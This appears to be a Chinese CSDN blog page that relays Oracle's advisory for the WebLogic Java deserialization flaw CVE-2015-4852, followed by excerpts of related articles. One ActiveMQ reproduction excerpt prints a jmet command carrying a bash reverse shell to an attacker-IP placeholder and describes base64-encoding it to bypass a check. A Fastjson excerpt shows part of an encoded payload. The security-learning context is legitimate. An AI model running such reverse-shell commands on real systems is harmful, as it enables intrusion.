关于java反序列化漏洞(java deserialization vulnerability)

最新推荐文章于 2024-09-09 03:48:04 发布
最新推荐文章于 2024-09-09 03:48:04 发布
阅读量1.9k 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: java 反序列化 漏洞 java deserialization
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/msdnchina/article/details/50550174
本文详细介绍了影响Oracle WebLogic Server的Java反序列化漏洞,包括受影响的产品版本、缓解建议及补丁信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

关于java反序列化漏洞(a deserialization vulnerability)

该漏洞的详情请见:
http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179

受影响的产品和版本:

Affected Products and Versions

Oracle WebLogic Server, versions 10.3.6.0, 12.1.2.0, 12.1.3.0, 12.2.1.0 are affected.

Mitigation recommendations are available at MOS Note 2076338.1, and will be updated as new information becomes available.
Creation of Oracle WebLogic Server patches is in progress. Patch Availability information will be updated at MOS Note 2075927.1

反序列化漏洞】关于反序列化漏洞的杂谈1 -- Apache Dubbo 反序列化漏洞 CVE-2023-29234
blackmagic的博客
07-26 1555
反序列化漏洞也被称为"unserialization vulnerability"。它存在于那些允许将对象从字符串或二进制数据转换回原始对象的应用程序中。反序列化漏洞的问题在于,恶意用户可以构造特殊的序列化数据,通过应用程序的反序列化过程来执行恶意代码。这可以导致应用程序在反序列化过程中执行任意的代码,包括读取、修改或删除应用程序的敏感数据,或者在应用程序上下文中执行不受控制的操作。
Fastjson反序列化漏洞部署复现1.2.24版本反序列RCE笔记
weixin_51339377的博客
11-09 1076
但是mvn clean package -DskipTests执行需要一个环境变量JAVA_HOME,且对应的地址是jdk文件夹,不带bin。之后rmi服务器从kali的4444端口去取恶意类 返回给rmi服务器 rmi服务器再返回给8090的fastjson执行。总结:所有的java的jdk jre也好 全都直接在path中设置绝对路径。最终通过刚才的工具 启动一个rmi服务器 加载刚才设置的恶意类。设置ip地址为可以访问到的 通过http进行访问测试。会先通过rmi请求到win10的rmi服务器。
JavaLearnVulnerability:Java漏洞学习笔记 Deserialization Vulnerability
05-12
JavaLearnVulnerability Java漏洞学习代码及笔记 项目TODO 漏洞代码完善中 漏洞使用和分析笔记准备中 目前文章分析地址在每一个包下package-info.java Java反序列化 Java反射 Java类加载 shiro漏洞分析 weblogic漏洞分析 fastjson漏洞分析 jackson漏洞分析 rmi、ldap spring漏洞分析 目前所有文章分析都在博客 后期会转到项目下,所有的分析文章写完之后统一转入。 项目优势: 1. 每一个漏洞环境都支持单独运行,方便分析 2. 漏洞都有分析文章,完全可以参考文章分析进行 3. 即使小白也能看懂 4. 每一个部分从基础的知识学习,再到漏洞实战分析,漏洞实战分析主要以最近几年的历史漏洞。 5. 由浅入深,由易到难。 项目说明 项目 说明 javatest 依赖文件都在lib目录下,
Cynthia - Fastjson deserialization vulnerability
st0ut的博客
03-25 3608
This is a Fastjson deserialization vulnerability 1.login fast Login required 2.Fastjson deserialization Trigger point http://xx.xxx.xxx.xx/cynthia/template/saveTemplateMailConfig.do?templateId=744313&templateMailOptions={“b”:{"\u0040\u0074\u0079\u007
Java反序列化漏洞分析
qq_51453285的博客
06-10 1299
Java反序列化漏洞Java Deserialization Vulnerabilities)是一种常见的安全漏洞,其攻击方式是利用Java中的序列化和反序列化机制,通过在序列化数据中插入恶意代码,导致反序列化过程中执行恶意代码。Java反序列化漏洞是由于Java序列化机制本身的缺陷导致的。为了防止恶意序列化数据被反序列化,可以在程序中对未知的序列化数据进行拒绝,或者对序列化数据进行白名单或黑名单的过滤。Java反序列化漏洞的攻击方式主要有两种:基于本地文件的反序列化攻击和基于网络的反序列化攻击。
反序列化漏洞
m0_63444285的博客
04-04 1747
反序列化漏洞通常会出现在Java、.NET、PHP等语言的应用程序中,例如Java中的ObjectInputStream、XMLDecoder,.NET中的BinaryFormatter、JavaScriptSerializer等,PHP中的unserialize函数等。反序列化漏洞Deserialization Vulnerability)是指攻击者利用应用程序在反序列化操作中的漏洞,将恶意序列化对象注入到应用程序中,从而执行未授权的操作或者以应用程序的身份执行恶意代码,从而导致系统被攻击的一种漏洞
Java 反序列化
sky123博客
09-09 2840
反序列化基础 Java 的序列化(Serialization)和反序列化Deserialization)是将对象的状态转换为字节流并恢复的过程。这个过程使对象可以保存到文件、通过网络传输或保存到数据库中,并在稍后恢复成对象。 序列化(Serialization):将 Java 对象的状态转换为字节流的过程。这使得对象可以保存到文件、发送到其他 JVM 甚至通过网络传输。 反序列化Deserialization):将字节流转换回 Java 对象的过程。这允许恢复先前序列化的对象状态。 序列化条件 要使
深入学习Java反序列化漏洞
反序列化漏洞Java安全领域是一个常见的安全问题,它涉及到将序列化的数据恢复为对象时可能出现的安全风险。 在Java中,序列化(Serialization)是将对象状态转换为可以保存或传输的格式(如二进制流)的过程,而...
Java反序列化漏洞利用:URLClassLoader执行链解析
有关Java反序列化漏洞的更多信息,可以查阅相关的安全研究文章,例如《java-deserialization-vulnerability-comments》。 总结,Java反序列化漏洞利用的关键在于找到合适的触发点,利用`URLClassLoader`来加载远程...
JAVA反序列化漏洞
最新发布
03-21
### Java 反序列化漏洞原理 Java 反串行化漏洞的核心在于应用程序在接受外部输入并将其反序列化的过程中,未能对可实例化的类进行有效限制。当恶意攻击者能够控制序列化流的内容时,他们可以注入特殊构造的对象链,...
Java反序列化终极测试工具
09-17
Java反序列化终极测试工具
Java-Deserialization-Cheat-Sheet:关于Java反序列化漏洞的备忘单
05-02
Java反序列化备忘单 面向渗透测试人员和研究人员的备忘单,其中涉及各种Java(JVM)序列化库中的反序列化漏洞。 请使用#javadeser哈希标签进行鸣叫。 表中的内容 json-io(JSON) 杰克逊(JSON) Fastjson(JSON) Genson(JSON) Flexjson(JSON) 乔德(JSON) 红色5 IO AMF(AMF) Apache Flex BlazeDS(AMF) 火烈鸟AMF(AMF) GraniteDS(AMF) Java WebORB(AMF) SnakeYAML(YAML) jYAML(YAML) YamlBeans(YAML) “安全”反序列化 Java本机序列化(二进制) 概述 Java反序列化安全性常见问题解答 来自Foxgloves安全 主要演讲,演讲和文档 编组泡菜 通过@frohoff &
SecExample:JAVA 漏洞靶场 (Vulnerability Environment For Java)
07-24
JAVA 漏洞靶场 截图 介绍 Name Star [注入漏洞-SQL注入] :glowing_star::glowing_star::glowing_star: [注入漏洞-命令注入] :glowing_star: [注入漏洞-spel表达式注入] :glowing_star::glowing_star::glowing_star: [XSS漏洞] :glowing_star: [CSRF漏洞] :glowing_star::glowing_star: [SSRF漏洞] :glowing_star::glowing_star: [CORS漏洞] :glowing_star::glowing_star::glowing_star::glowing_star: [反序列化漏洞-Fastjson反序列化] :glowing_star::glowing_star::glowing_star::glowing_star: [验证码相关漏洞] :glowing_star::glowing_star: 安装 git clone https://github.com/tangxiaofeng7/Se
java-vulnerability
04-23
Java秒代码 Java sec代码是用于学习Java漏洞代码的非常强大且友好的项目。 介绍 该项目也可以称为Java漏洞代码。 除非没有漏洞,否则每个漏洞类型代码默认都有一个安全漏洞。 相关的修订代码在注释或代码中。 具体来说,您可以查看每个漏洞代码和注释。 由于服务器到期,因此在线演示站点必须脱机。 登录用户名和密码: admin/admin123 joychou/joychou123 漏洞代码 按字母排序。 ooxmlXXE 路径遍历 RCE 运行 流程构建器 脚本引擎 Yaml反序列化 Groovy 昂首阔步 SpEL SQL注入 SSRF 科学技术研究院 URL重定向 URL白名单绕过 xlsxStreamerXXE XSS XStream的 XXE 漏洞描述 RCE执行器 CORS CSRF 反序列化 Fastjson Java RMI JSO
JAVA代码审计之java反序列化
知识分享官
09-23 437
序列化数据结构可以了解到包含了类的名称及serialVersionUID 的ObjectStreamClass描述符在序列化对象流的前面位置,且在 readObject反序列化时首先会调用resolveClass读取反序列化的 类名,所以这里通过重写ObjectInputStream对象的 resolveClass方法即可实现对反序列化类的校验。但当输入的反序列化的数据可被用户控制,那么攻击者即可通过构造恶意输入,让反序列化产生非预期 的对象,在此过程中执行构造的任意代码。
Java deserialization RCE in Tomcat cluster
热门推荐
Exploit的小站~
05-10 1万+
最近楼主也没有其他的时间来做漏洞研究了,读者们可以从本博上次更新的时间就可以看出来=_,=。 但是为了一直关注本楼主的朋友们,我决定拿出两年前的一个存货(其实是辣鸡洞)分享,诚意满满(大雾)。 以下是正文: —————————————————————————————————————————————————————— TL;DR: 本文主要介绍Tomcat集群的实现机制以及如何发现了反序列化...
ActiveMQ反序列化漏洞复现
qq_45396375的博客
01-14 429
【代码】ActiveMQ反序列化漏洞复现。
ActiveMQ 反序列化漏洞复现及利用
Tauil的博客
07-19 1247
会发现什么都没有发生,但是在被攻击机中输入bash-i>&/dev/tcp/攻击机IP/44440>&1他是可以正常连接的,说明命令没有问题,那么唯一的可能就是存在了检验,不给执行该命令,所以我们可以进行简单的绕过,将命令进行base64编码。java-jarjmet-0.1.0-all.jar-Qhacker-IActiveMQ-s-Y“bash-i>&/dev/tcp/攻击机IP/44440>&1”-YpROME被攻击机IP61616。(一定要是java8!......
理解Java里面的序列化和反序列化
三劫散仙
02-27 226
(一)什么是序列化和反序列化 序列化(serialization)和反序列化deserialization)是将对象转化成字节数组以方便保存或者用于网络传输,这个对象可以是一个图片,一个字符串,一个class等等,常见序列化格式有字节数组,json格式,xml格式,更加高效的有google开源的Protocol Buffers,以及Apache Avro。 (二)为什么需要序...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值